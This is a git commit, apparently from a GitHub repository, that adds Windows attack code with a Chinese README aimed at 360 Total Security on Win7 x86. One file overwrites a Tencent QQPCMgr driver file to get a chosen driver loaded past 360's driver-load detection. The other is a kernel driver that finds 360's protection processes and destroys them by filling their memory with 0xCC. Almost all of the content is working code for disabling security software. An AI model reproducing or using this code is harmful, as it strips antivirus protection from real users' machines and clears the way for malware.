Add files via upload

2018-05-21 15:08:26 +08:00 · 2018-05-21 15:08:26 +08:00 · d81fb437dc
parent b0b00de712
commit d81fb437dc
5 changed files with 661 additions and 0 deletions
--- a/BypassDriverDetection.cpp
+++ b/BypassDriverDetection.cpp
@ -0,0 +1,108 @@
+
+#include <Windows.h>
+#include <tchar.h>
+
+////声明NtWriteFile 及其参数类型
+////此方法已失效
+//typedef struct _IO_STATUS_BLOCK {
+//	union {
+//		NTSTATUS Status;
+//		PVOID Pointer;
+//	} DUMMYUNIONNAME;
+//
+//	ULONG_PTR Information;
+//} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+//
+//typedef
+//VOID
+//(NTAPI *PIO_APC_ROUTINE) (
+//_In_ PVOID ApcContext,
+//_In_ PIO_STATUS_BLOCK IoStatusBlock,
+//_In_ ULONG Reserved
+//);
+//
+//typedef
+//NTSTATUS
+//(*NtWriteFile)(
+//__in HANDLE FileHandle,
+//__in_opt HANDLE Event,
+//__in_opt PIO_APC_ROUTINE ApcRoutine,
+//__in_opt PVOID ApcContext,
+//__out PIO_STATUS_BLOCK IoStatusBlock,
+//__in_bcount(Length) PVOID Buffer,
+//__in ULONG Length,
+//__in_opt PLARGE_INTEGER ByteOffset,
+//__in_opt PULONG Key
+//);
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+	////把指定目录下的文件覆盖 到键值目录下的文件
+	
+	HANDLE hFile= CreateFile(L"C:\\KillDriver",GENERIC_READ,NULL,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+	if (INVALID_HANDLE_VALUE == hFile)
+	{
+		return FALSE;
+	}
+	DWORD FileSizeHigh;
+	DWORD FileSizeLow;
+	FileSizeLow = GetFileSize(hFile, &FileSizeHigh);
+
+	BYTE* Buf = new BYTE[FileSizeLow];
+
+	DWORD error = ReadFile(hFile, Buf, FileSizeLow, &FileSizeHigh, NULL);
+	if (error == 0)
+	{
+		return FALSE;
+	}
+
+	//创建新文件覆盖原文件
+	HANDLE hFile2 = CreateFile(L"C:\\Program Files\\Tencent\\QQPCMgr\\SRepairDrv", 
+		GENERIC_READ | GENERIC_WRITE, NULL, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+	if (hFile2 == INVALID_HANDLE_VALUE)
+	{
+		return FALSE;
+	}
+
+	////获取NtWriteFile,采用NtWriteFile写入文件。
+	////此处失效
+	//
+	//HMODULE hNtdll = LoadLibrary(L"ntdll.dll");
+	//NtWriteFile RNtWriteFile = (NtWriteFile)GetProcAddress(hNtdll, "NtWriteFile");
+	//
+	//IO_STATUS_BLOCK FunRent = {};
+	//
+	//PLARGE_INTEGER oFFset = 0;
+	//RNtWriteFile(hFile2, NULL, NULL, NULL, &FunRent, Buf, FileSizeLow, oFFset, NULL);
+	//DWORD error = GetLastError();
+
+
+	//采用文件映射,写入文件。
+	HANDLE hFileMap = CreateFileMapping(hFile2, NULL, PAGE_READWRITE, 0, FileSizeLow, NULL);
+	if (hFileMap == NULL)
+	{
+		return FALSE;
+	}
+
+	//映射映射视图
+	PVOID MapFileAddress = MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, FileSizeLow);
+	if (MapFileAddress == NULL)
+	{
+		return FALSE;
+	}
+
+	//拷贝buf进映射视图
+	memcpy(MapFileAddress, Buf, FileSizeLow);
+
+	//映射到磁盘文件
+	FlushViewOfFile(MapFileAddress, FileSizeLow);
+
+	UnmapViewOfFile(MapFileAddress);
+
+		CloseHandle(hFile);
+		CloseHandle(hFile2);
+		CloseHandle(hFileMap);
+		delete[]Buf;
+	
+		return 0;
+}
--- a/Kill360Process.c
+++ b/Kill360Process.c
@ -0,0 +1,521 @@
+
+#include <ntifs.h>
+
+///	内核函数声明
+NTKERNELAPI
+VOID
+KeAttachProcess(
+IN PRKPROCESS Process
+);
+
+NTKERNELAPI
+VOID
+KeDetachProcess(
+VOID
+);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+ZwQueryInformationProcess(
+__in HANDLE ProcessHandle,
+__in PROCESSINFOCLASS ProcessInformationClass,
+__out_bcount(ProcessInformationLength) PVOID ProcessInformation,
+__in ULONG ProcessInformationLength,
+__out_opt PULONG ReturnLength
+);
+
+
+
+////	结构体
+//PED和PTE的结构
+
+//开启PAE版
+typedef struct _MMPTE_HARDWARE_PAE {
+	ULONGLONG Valid : 1;
+	ULONGLONG Write : 1;        // UP version
+	ULONGLONG Owner : 1;
+	ULONGLONG WriteThrough : 1;
+	ULONGLONG CacheDisable : 1;
+	ULONGLONG Accessed : 1;
+	ULONGLONG Dirty : 1;
+	ULONGLONG LargePage : 1;
+	ULONGLONG Global : 1;
+	ULONGLONG CopyOnWrite : 1; // software field
+	ULONGLONG Prototype : 1;   // software field
+	ULONGLONG reserved0 : 1;  // software field
+	ULONGLONG PageFrameNumber : 24;
+	ULONGLONG reserved1 : 28;  // software field
+} MMPTE_HARDWARE_PAE, *PMMPTE_HARDWARE_PAE;
+
+typedef struct _MMPTE_PAE {
+	union  {
+		MMPTE_HARDWARE_PAE Hard;
+	} u;
+} MMPTE_PAE, *PMMPTE_PAE;
+
+//未开启PAE版
+typedef struct _MMPTE_HARDWARE {
+	ULONG Valid : 1;
+	ULONG Write : 1;       // UP version
+	ULONG Owner : 1;
+	ULONG WriteThrough : 1;
+	ULONG CacheDisable : 1;
+	ULONG Accessed : 1;
+	ULONG Dirty : 1;
+	ULONG LargePage : 1;
+	ULONG Global : 1;
+	ULONG CopyOnWrite : 1; // software field
+	ULONG Prototype : 1;   // software field
+	ULONG reserved : 1;    // software field
+	ULONG PageFrameNumber : 20;
+} MMPTE_HARDWARE, *PMMPTE_HARDWARE;
+
+typedef struct _MMPTE {
+	union  {
+		MMPTE_HARDWARE Hard;
+	} u;
+} MMPTE, *PMMPTE;
+
+
+
+////	宏
+//获得PDE和PTE
+
+#define PTE_BASE    0xC0000000
+#define PDE_BASE    0xC0300000
+#define PDE_BASE_PAE 0xc0600000
+
+//开启PAE版
+#define MiGetPdeAddressPae(va)   ((PMMPTE_PAE)(PDE_BASE_PAE + ((((ULONG)(va)) >> 21) << 3)))
+#define MiGetPteAddressPae(va)   ((PMMPTE_PAE)(PTE_BASE + ((((ULONG)(va)) >> 12) << 3)))
+
+//未开启PAE版
+#define MiGetPdeAddress(va)  ((MMPTE*)(((((ULONG)(va)) >> 22) << 2) + PDE_BASE))
+#define MiGetPteAddress(va) ((MMPTE*)(((((ULONG)(va)) >> 12) << 2) + PTE_BASE))
+
+//win7 32位下ActiveProcessLinks的偏移
+#define  ActiveProcessLinksOffset 0xB8
+//进程名大小
+#define  ProcessNameSize 0x260 
+//目标进程名
+//Tray有时会大小写
+#define TargetProNameTarap L"360Tray.exe"
+#define TargetProNametarap L"360tray.exe"
+#define TargetProNameZDFY L"ZhuDongFangYu.exe"
+#define TargetProNameHel L"360UHelper.exe"
+#define TargetProNamesee L"360speedld.exe"
+
+
+//开启PAE版
+ULONG MmIsAddressValidExPae(
+	IN PVOID Pointer
+	)
+{
+	MMPTE_PAE* Pde;
+	MMPTE_PAE* Pte;
+
+	Pde = MiGetPdeAddressPae(Pointer);
+
+	if (Pde->u.Hard.Valid)
+	{
+		//判断PDE大页情况
+		if (Pde->u.Hard.LargePage != 0)		
+		{
+			Pte = Pde;
+		}
+		else
+		{
+			Pte = MiGetPteAddressPae(Pointer);
+		}
+
+		if (Pte->u.Hard.Valid)
+		{
+			return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+
+//未开启PAE版
+ULONG MmIsAddressValidExNotPae(
+	IN PVOID Pointer
+	)
+{
+	MMPTE* Pde;
+	MMPTE* Pte;
+
+	Pde = MiGetPdeAddress(Pointer);
+
+	if (Pde->u.Hard.Valid)
+	{
+		Pte = MiGetPteAddress(Pointer);
+
+		if (Pte->u.Hard.Valid)
+		{
+			return TRUE;
+		}
+
+		//源码忽略PDE大页情况
+	}
+
+	return FALSE;
+}
+
+
+
+//判断地址是否有效
+ULONG MiIsAddressValidEx(
+	IN PVOID Pointer
+	)
+{
+	//地址为空则无效
+	if (!ARGUMENT_PRESENT(Pointer) ||
+		!Pointer){
+		return FALSE;
+	}
+
+	//// 页面检测
+	//检测是否开启PAE
+	ULONG uCR4 = 0;
+	_asm{
+		// mov eax, cr4
+		__asm _emit 0x0F __asm _emit 0x20 __asm _emit 0xE0;
+		mov uCR4, eax;
+	}
+	if (uCR4 & 0x20) {
+		return MmIsAddressValidExPae(Pointer);
+	}
+	else {
+		return MmIsAddressValidExNotPae(Pointer);
+	}
+
+	return TRUE;
+
+	//此函数用于 同时判断内核对象地址是否有效。
+	//对象的地址也是一个页面地址。
+
+}
+
+
+
+//ZeroProcessMemory：破环进程空间
+BOOLEAN ZeroProcessMemory(ULONG EProcess)
+{
+	ULONG ulVirtualAddr;
+	BOOLEAN b_OK = FALSE;
+	PVOID OverlayBuf = NULL;
+
+	//申请填满0xcc的覆盖空间
+	OverlayBuf = ExAllocatePool(NonPagedPool, 0x1024);
+	if (!OverlayBuf){
+		return FALSE;
+	}
+
+	memset(OverlayBuf, 0xcc, 0x1024);
+
+	//Attach进目标进程
+	KeAttachProcess((PEPROCESS)EProcess); 
+
+	//循环填充进程空间
+	for (ulVirtualAddr = 0; ulVirtualAddr <= 0x7fffffff; ulVirtualAddr += 0x1024)
+	{
+		if (MiIsAddressValidEx((PVOID)ulVirtualAddr))
+		{
+			__try
+			{
+				//不可写会抛出异常
+				ProbeForWrite((PVOID)ulVirtualAddr, 0x1024, sizeof(ULONG));
+				RtlCopyMemory((PVOID)ulVirtualAddr, OverlayBuf, 0x1024);
+				b_OK = TRUE;
+			}
+			__except (EXCEPTION_EXECUTE_HANDLER){
+				continue;
+			}
+		}
+		else{
+			if (ulVirtualAddr > 0x1000000)  //填这么多足够破坏进程数据了
+				break;
+		}
+	}
+
+	//退出这个进程的空间
+	KeDetachProcess();
+
+	//释放申请的内存
+	ExFreePool(OverlayBuf);
+
+	////验证下是否结束了这个进程
+	//这种方法并不可靠
+	//Status = ObOpenObjectByPointer(
+	//	(PEPROCESS)EProcess,
+	//	OBJ_KERNEL_HANDLE,
+	//	0,
+	//	GENERIC_READ,
+	//	NULL,
+	//	KernelMode,
+	//	&ProcessHandle
+	//	);
+
+	////进程还存在，结束失败
+	//if (NT_SUCCESS(Status)){
+	//	ZwClose(ProcessHandle);
+	//	b_OK = FALSE;
+	//}
+
+
+	return b_OK;
+}
+
+
+//路径名解析出文件名
+void splitname(const PWCHAR szPath,PWCHAR * szfilename)
+{
+	//从后遍历获得文件名
+
+	ULONG i;
+
+	i = 0;
+	
+	i = wcslen(szPath); 
+
+	while (szPath[i] != (WCHAR)'\\')
+		i--;
+
+	i++;
+
+
+	*szfilename = (PWCHAR)((ULONG)szPath + (i*2));
+}
+
+
+//通过进程链遍历进程
+PEPROCESS GetEProcessByName(PUNICODE_STRING _ProcessName)
+{
+	NTSTATUS st = STATUS_UNSUCCESSFUL;
+	HANDLE hPro = NULL;
+	PEPROCESS FounPro = NULL;
+
+	//从系统进程开始遍历
+	PEPROCESS eProces = (PEPROCESS)IoGetCurrentProcess();
+
+	//链表头结点
+	PLIST_ENTRY ListHead = (PLIST_ENTRY)((ULONG)eProces + ActiveProcessLinksOffset);
+	//下一结点
+	PLIST_ENTRY Entry = ListHead->Flink;
+
+	PUNICODE_STRING pPath = (PUNICODE_STRING)ExAllocatePool(NonPagedPool, ProcessNameSize);
+	
+	while (Entry != ListHead)
+	{
+		FounPro = (PEPROCESS)((ULONG)Entry - ActiveProcessLinksOffset);
+
+		Entry = Entry->Flink;
+		if (Entry == NULL)
+		{
+			KdPrint(("被断链了 \n"));
+			break;
+		}
+
+		__try
+		{
+
+			RtlZeroMemory(pPath, ProcessNameSize);
+
+			////获取稳定的进程名
+			st = ObOpenObjectByPointer(FounPro, OBJ_KERNEL_HANDLE, NULL, 0, NULL, KernelMode, &hPro);
+			if (!NT_SUCCESS(st))
+			{
+				FounPro = NULL;
+				break;
+			}
+
+			ULONG OutSize = 0;
+			st = ZwQueryInformationProcess(hPro, ProcessImageFileName, pPath, ProcessNameSize, &OutSize);
+			if (!NT_SUCCESS(st))
+			{
+				FounPro = NULL;
+				break;
+			}
+
+			//分离路径得文件名
+			PWCHAR ProName = NULL;
+			splitname(pPath->Buffer, &ProName);
+
+			KdPrint((("进程名：%ws \n"), ProName));
+
+			if (!wcscmp(_ProcessName->Buffer, ProName))
+			{
+				KdPrint(("找到了 \n"));
+				break;
+			}
+		}
+		__except (EXCEPTION_EXECUTE_HANDLER)
+		{
+			FounPro = NULL;
+			continue;
+		}
+
+		FounPro = NULL;
+	}
+
+	ZwClose(hPro);
+	ExFreePool(pPath);
+	ObDereferenceObject(eProces);
+
+	return FounPro;
+}
+
+
+////判断进程是否有效
+//这是A-Protect的源码，但经测试并不可靠
+//BOOLEAN IsExitProcess(PEPROCESS Eprocess)
+//{
+//	ULONG SectionObjectOffset = NULL;
+//	ULONG SegmentOffset = NULL;
+//	ULONG SectionObject;
+//	ULONG Segment;
+//	BOOLEAN b_OK = FALSE;
+//
+//	__try
+//	{
+//		//这里锁定Win7 7000 所以直接加偏移
+//
+//		if (MmIsAddressValidExPae(((ULONG)Eprocess + 0x128))){
+//				SectionObject = *(PULONG)((ULONG)Eprocess + 0x128);
+//
+//				if (MmIsAddressValidExPae(((ULONG)SectionObject + 0x14))){
+//					Segment = *(PULONG)((ULONG)SectionObject + 0x14);
+//
+//					if (MmIsAddressValidExPae(Segment)){
+//						b_OK = TRUE;  //进程是有效的
+//						__leave;
+//					}
+//				}
+//			}
+//		}
+//	
+//	__except (EXCEPTION_EXECUTE_HANDLER){
+//		//接收异常
+//	}
+//	return b_OK;
+//
+//	//经测试，这种方式不可靠，因为有些存活进程的内存对象为NULL。
+//}
+
+////DPC回调
+//已废
+//VOID DpcForTimer(IN struct _KDPC  *Dpc, IN PVOID  DeferredContext,
+//	IN PVOID  SystemArgument1, IN PVOID  SystemArgument2)
+//{
+//	UNREFERENCED_PARAMETER(Dpc);
+//	UNREFERENCED_PARAMETER(DeferredContext);
+//	UNREFERENCED_PARAMETER(SystemArgument1);
+//	UNREFERENCED_PARAMETER(SystemArgument2);
+//
+//	_asm int 3;
+//	//360Trap
+//	GetProNameToKillProcess(TargetProNameTarap);
+//
+//	//360trap
+//	GetProNameToKillProcess(TargetProNametarap);
+//
+//	//ZhuDongFangYu
+//	GetProNameToKillProcess(TargetProNameZDFY);
+//
+//	//360UHelper.exe
+//	GetProNameToKillProcess(TargetProNameHel);
+//}
+
+BOOLEAN GetProNameToKillProcess(PWCHAR ProName)
+{
+	//根据进程名得到EPROCESS
+	UNICODE_STRING UName = RTL_CONSTANT_STRING(ProName);
+	PEPROCESS eProcess = GetEProcessByName(&UName);
+	if (eProcess != NULL)
+	{
+		if (ZeroProcessMemory((ULONG)eProcess))		//	破环进程空间
+		{
+			KdPrint((("成功干掉 %ws \n"), ProName));
+			return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+//创建线程等待
+NTSTATUS ThreadProc()
+{
+	//等待360相关进程创建  60秒
+	//时间换算
+	LARGE_INTEGER interval;
+	interval.QuadPart = (-10 * 1000);
+	interval.QuadPart *= 1000 * 60;
+	KeDelayExecutionThread(KernelMode, FALSE, &interval);
+
+		//_asm int 3;
+
+		//360UHelper.exe
+		GetProNameToKillProcess(TargetProNameHel);
+
+		//360UHelper.exe
+		GetProNameToKillProcess(TargetProNamesee);
+
+		//ZhuDongFangYu
+		GetProNameToKillProcess(TargetProNameZDFY);
+
+		//360Trap
+		GetProNameToKillProcess(TargetProNameTarap);
+	
+		//360trap
+		GetProNameToKillProcess(TargetProNametarap);
+	
+	// 退出线程   
+	PsTerminateSystemThread(STATUS_SUCCESS);
+}
+
+NTSTATUS UnLoadDriver(PDRIVER_OBJECT DriverObject)
+{
+	UNREFERENCED_PARAMETER(DriverObject);
+	return STATUS_SUCCESS;
+}
+
+NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegisterPath)
+{
+	UNREFERENCED_PARAMETER(RegisterPath);
+	DriverObject->DriverUnload = UnLoadDriver;
+
+	//打印信息
+	//_asm int 3;
+	KdPrint(("成功绕过驱动拦截"));
+
+
+	////等待360相关进程创建  60秒
+	////时间换算
+	//会黑屏
+	//LARGE_INTEGER interval;
+	//interval.QuadPart = (-10 * 1000);
+	//interval.QuadPart *= 1000 * 60;
+	//KeDelayExecutionThread(KernelMode, FALSE, &interval);
+
+	//////等待360相关进程创建  60秒
+	////设置DPC定时器
+	////在DPC内由于IRQL不能使用ObOpenObjectByPointer等函数。
+	//PKTIMER pktimer = (PKTIMER)ExAllocatePoolWithTag(NonPagedPool, sizeof(KTIMER), 'RM');
+	//PKDPC pKdpc = (PKDPC)ExAllocatePoolWithTag(NonPagedPool, sizeof(KDPC), 'RM');
+	//KeInitializeDpc(pKdpc, (PKDEFERRED_ROUTINE)DpcForTimer, NULL);
+	//KeInitializeTimerEx(pktimer, NotificationTimer);
+	//
+	//LARGE_INTEGER settime = { 0 };
+	//settime.QuadPart = 60 * 1000000 * -10;
+	//KeSetTimer(pktimer, settime, pKdpc);
+
+	//等待360相关进程创建  60秒
+	//创建线程并等待
+	HANDLE hThread = NULL;
+	PsCreateSystemThread(&hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, ThreadProc, NULL);
+	
+	ZwClose(hThread);
+	return STATUS_SUCCESS;
+}
--- a/KillAndBypass.rar
+++ b/KillAndBypass.rar
--- a/KillAndBypassReport.docx
+++ b/KillAndBypassReport.docx
--- a/README.md
+++ b/README.md
@ -0,0 +1,32 @@
+# BypassDriverDetection_And_Kill360Process
+
+**环境：Win7 7600 x86**
+
+**360版本：11.4.0.2002**
+
+**目标1：绕过360加载驱动检测。**
+
+**目标2：实现结束360关键进程。**
+
+# 一、Ring3绕过360加载驱动检测
+## 1.1、选取方向
+## 1.2、确定寄宿者
+## 1.3、Test
+## 1.4、移花接木
+## 1.5、Extend
+
+# 二、实现结束360关键进程
+## 1、MiIsAddressValidEx
+
+## 2.1、ZeroProcessMemory
+## 2.2、杀掉进程其它实现：
+
+## 3、分析Win2000源码
+### 3.1、MmIsAddressValid
+### 3.2、ProbeForRead()
+### 3.3、ProbeForWrite()
+### 3.4、总结：
+
+# 三、实现代码：
+## 1、绕过检测代码
+## 2、结束进程代码